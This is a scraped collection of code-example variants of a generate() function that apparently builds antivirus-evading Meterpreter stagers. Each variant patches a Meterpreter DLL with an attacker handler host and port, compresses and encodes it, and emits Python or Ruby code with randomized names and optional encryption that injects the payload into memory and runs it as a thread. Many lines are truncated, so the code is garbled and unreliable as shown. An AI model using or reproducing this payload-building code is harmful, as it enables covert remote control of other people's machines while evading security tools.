def generate(self):
        if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
            print "[*] Error: You either do not have the latest version of Metasploit or"
            print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
            print "[*] Error: Please fix either issue then select this payload again!"
        f = open(metsrvPath, 'rb')
        meterpreterDll =
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        # actually build out the payload
        payloadCode = ""
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):

        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        meterpreterDll, headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "http://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        # actually build out the payload
        payloadCode = ""
        # traditional void pointer injection
        if self.required_options["inject_method"][0].lower() == "void":

            # doing void * cast
            payloadCode += "from ctypes import *\nimport base64,zlib\n"

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            randVarName = helpers.randomString()
            randFuncName = helpers.randomString()
            payloadCode += randVarName + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"
            payloadCode += randFuncName + " = cast(" + randVarName + ", CFUNCTYPE(c_void_p))\n"
            payloadCode += randFuncName+"()\n"

        # VirtualAlloc() injection

            payloadCode += 'import ctypes,base64,zlib\n'

            randInflateFuncName = helpers.randomString()
            randb64stringName = helpers.randomString()
            randVarName = helpers.randomString()
            randPtr = helpers.randomString()
            randBuf = helpers.randomString()
            randHt = helpers.randomString()

            # deflate function
            payloadCode += "def "+randInflateFuncName+"("+randb64stringName+"):\n"
            payloadCode += "\t" + randVarName + " = base64.b64decode( "+randb64stringName+" )\n"
            payloadCode += "\treturn zlib.decompress( "+randVarName+" , -15)\n"

            payloadCode += randVarName + " = bytearray(" + randInflateFuncName + "(\"" + compressedDll + "\"))\n"
            payloadCode += randPtr + ' = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len('+ randVarName +')),ctypes.c_int(0x3000),ctypes.c_int(0x40))\n'
            payloadCode += randBuf + ' = (ctypes.c_char * len(' + randVarName + ')).from_buffer(' + randVarName + ')\n'
            payloadCode += 'ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(' + randPtr + '),' + randBuf + ',ctypes.c_int(len(' + randVarName + ')))\n'
            payloadCode += randHt + ' = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_int(' + randPtr + '),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))\n'
            payloadCode += 'ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(' + randHt + '),ctypes.c_int(-1))\n'

        if self.required_options["use_pyherion"][0].lower() == "y":
            payloadCode = encryption.pyherion(payloadCode)

        return payloadCode
    def generate(self):
        if os.path.exists(settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"):
            metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
            print "[*] Error: You either do not have the latest version of Metasploit or"
            print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
            print "[*] Error: Please fix either issue then select this payload again!"
        f = open(metsrvPath, 'rb')
        meterpreterDll =
        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll,ind,s: dll[:ind] + s + dll[ind+len(s):]

        # patch the metsrv.dll header
        headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll,0,headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll,userAgentIndex,userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll,sslIndex,sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum() + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll,urlIndex,urlString)
        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll,expirationTimeoutIndex,expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll,communicationTimeoutIndex,communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)
        # actually build out the payload
        payloadCode = ""
        payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
        payloadCode += "exit if Object.const_defined?(:Ocra)\n"

        # randomly generate out variable names
        payloadName = helpers.randomString().lower()
        ptrName = helpers.randomString().lower()
        threadName = helpers.randomString().lower()
        Shellcode = helpers.randomString().lower()
        randInflateFuncName = helpers.randomString().lower()
        randb64stringName = helpers.randomString().lower()
        randVarName = helpers.randomString().lower()

        # deflate function
        payloadCode += "def "+randInflateFuncName+"("+randb64stringName+")\n"
        payloadCode += "  " + randVarName + " = Base64.decode64("+randb64stringName+")\n"
        payloadCode += "  zstream =\n"
        payloadCode += "  buf = zstream.inflate("+ randVarName +")\n"
        payloadCode += "  zstream.finish\n"
        payloadCode += "  zstream.close\n"
        payloadCode += "  return buf\n"
        payloadCode += "end\n\n"

        payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"

        payloadCode += "v ='VirtualAlloc', 'IIII', 'I');r ='RtlMoveMemory', 'IPI', 'V');c ='CreateThread', 'IIIIIP', 'I');w ='WaitForSingleObject', 'II', 'I')\n"
        payloadCode += "%s = %s\n" %(payloadName, Shellcode)
        payloadCode += "%s =,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" %(ptrName,payloadName,payloadName)
        payloadCode += "x =,%s,%s.length); %s =,0,%s,0,0,0); x =,0xFFFFFFF)\n" %(ptrName,payloadName,payloadName,threadName,ptrName,threadName)

        return payloadCode
Exemple #4
    def generate(self):

        if os.path.exists(
                settings.METASPLOIT_PATH +
            metsrvPath = settings.METASPLOIT_PATH + "/vendor/bundle/ruby/1.9.1/gems/meterpreter_bins-0.0.10/meterpreter/metsrv.x86.dll"
            print "[*] Error: You either do not have the latest version of Metasploit or"
            print "[*] Error: do not have your METASPLOIT_PATH set correctly in your settings file."
            print "[*] Error: Please fix either issue then select this payload again!"

        f = open(metsrvPath, 'rb')
        meterpreterDll =

        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s):]

        # patch the metsrv.dll header
        headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex,

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTPS\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = "https://" + self.required_options['LHOST'][0] + ":" + str(
            self.required_options['LPORT'][0]) + "/" + self.genHTTPChecksum(
            ) + "_" + helpers.randomString(16) + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(
            struct.pack('<I', 0xb64be661))
        expirationTimeout = struct.pack('<I', 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex,

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(
            struct.pack('<I', 0xaf79257f))
        communicationTimeout = struct.pack('<I', 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex,

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        payloadCode = "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
        payloadCode += "exit if Object.const_defined?(:Ocra)\n"

        # randomly generate out variable names
        payloadName = helpers.randomString().lower()
        ptrName = helpers.randomString().lower()
        threadName = helpers.randomString().lower()
        Shellcode = helpers.randomString().lower()
        randInflateFuncName = helpers.randomString().lower()
        randb64stringName = helpers.randomString().lower()
        randVarName = helpers.randomString().lower()

        # deflate function
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
        payloadCode += "  " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
        payloadCode += "  zstream =\n"
        payloadCode += "  buf = zstream.inflate(" + randVarName + ")\n"
        payloadCode += "  zstream.finish\n"
        payloadCode += "  zstream.close\n"
        payloadCode += "  return buf\n"
        payloadCode += "end\n\n"

        payloadCode += Shellcode + " = " + randInflateFuncName + "(\"" + compressedDll + "\")\n"

        payloadCode += "v ='VirtualAlloc', 'IIII', 'I');r ='RtlMoveMemory', 'IPI', 'V');c ='CreateThread', 'IIIIIP', 'I');w ='WaitForSingleObject', 'II', 'I')\n"
        payloadCode += "%s = %s\n" % (payloadName, Shellcode)
        payloadCode += "%s =,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
            ptrName, payloadName, payloadName)
        payloadCode += "x =,%s,%s.length); %s =,0,%s,0,0,0); x =,0xFFFFFFF)\n" % (
            ptrName, payloadName, payloadName, threadName, ptrName, threadName)

        return payloadCode
Exemple #5
    def generate(self):

        # lambda function used for patching the metsvc.dll
        dllReplace = lambda dll, ind, s: dll[:ind] + s + dll[ind + len(s) :]

        # patch the metsrv.dll header
        meterpreterDll, headerPatch = helpers.selfcontained_patch()
        meterpreterDll = dllReplace(meterpreterDll, 0, headerPatch)

        # patch in the default user agent string
        userAgentIndex = meterpreterDll.index("METERPRETER_UA\x00")
        userAgentString = "Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)\x00"
        meterpreterDll = dllReplace(meterpreterDll, userAgentIndex, userAgentString)

        # turn off SSL
        sslIndex = meterpreterDll.index("METERPRETER_TRANSPORT_SSL")
        sslString = "METERPRETER_TRANSPORT_HTTP\x00"
        meterpreterDll = dllReplace(meterpreterDll, sslIndex, sslString)

        # replace the URL/port of the handler
        urlIndex = meterpreterDll.index("https://" + ("X" * 256))
        urlString = (
            + self.required_options["LHOST"][0]
            + ":"
            + str(self.required_options["LPORT"][0])
            + "/"
            + self.genHTTPChecksum()
            + "_"
            + helpers.randomString(16)
            + "/\x00"
        meterpreterDll = dllReplace(meterpreterDll, urlIndex, urlString)

        # replace the expiration timeout with the default value of 300
        expirationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xB64BE661))
        expirationTimeout = struct.pack("<I", 604800)
        meterpreterDll = dllReplace(meterpreterDll, expirationTimeoutIndex, expirationTimeout)

        # replace the communication timeout with the default value of 300
        communicationTimeoutIndex = meterpreterDll.index(struct.pack("<I", 0xAF79257F))
        communicationTimeout = struct.pack("<I", 300)
        meterpreterDll = dllReplace(meterpreterDll, communicationTimeoutIndex, communicationTimeout)

        # compress/base64 encode the dll
        compressedDll = helpers.deflate(meterpreterDll)

        # actually build out the payload
        payloadCode = ""

        payloadCode = (
            "require 'rubygems';require 'win32/api';require 'socket';require 'base64';require 'zlib';include Win32\n"
        payloadCode += "exit if Object.const_defined?(:Ocra)\n"

        # randomly generate out variable names
        payloadName = helpers.randomString().lower()
        ptrName = helpers.randomString().lower()
        threadName = helpers.randomString().lower()
        Shellcode = helpers.randomString().lower()
        randInflateFuncName = helpers.randomString().lower()
        randb64stringName = helpers.randomString().lower()
        randVarName = helpers.randomString().lower()

        # deflate function
        payloadCode += "def " + randInflateFuncName + "(" + randb64stringName + ")\n"
        payloadCode += "  " + randVarName + " = Base64.decode64(" + randb64stringName + ")\n"
        payloadCode += "  zstream =\n"
        payloadCode += "  buf = zstream.inflate(" + randVarName + ")\n"
        payloadCode += "  zstream.finish\n"
        payloadCode += "  zstream.close\n"
        payloadCode += "  return buf\n"
        payloadCode += "end\n\n"

        payloadCode += Shellcode + " = " + randInflateFuncName + '("' + compressedDll + '")\n'

        payloadCode += "v ='VirtualAlloc', 'IIII', 'I');r ='RtlMoveMemory', 'IPI', 'V');c ='CreateThread', 'IIIIIP', 'I');w ='WaitForSingleObject', 'II', 'I')\n"
        payloadCode += "%s = %s\n" % (payloadName, Shellcode)
        payloadCode += "%s =,(%s.length > 0x1000 ? %s.length : 0x1000), 0x1000, 0x40)\n" % (
        payloadCode += "x =,%s,%s.length); %s =,0,%s,0,0,0); x =,0xFFFFFFF)\n" % (

        return payloadCode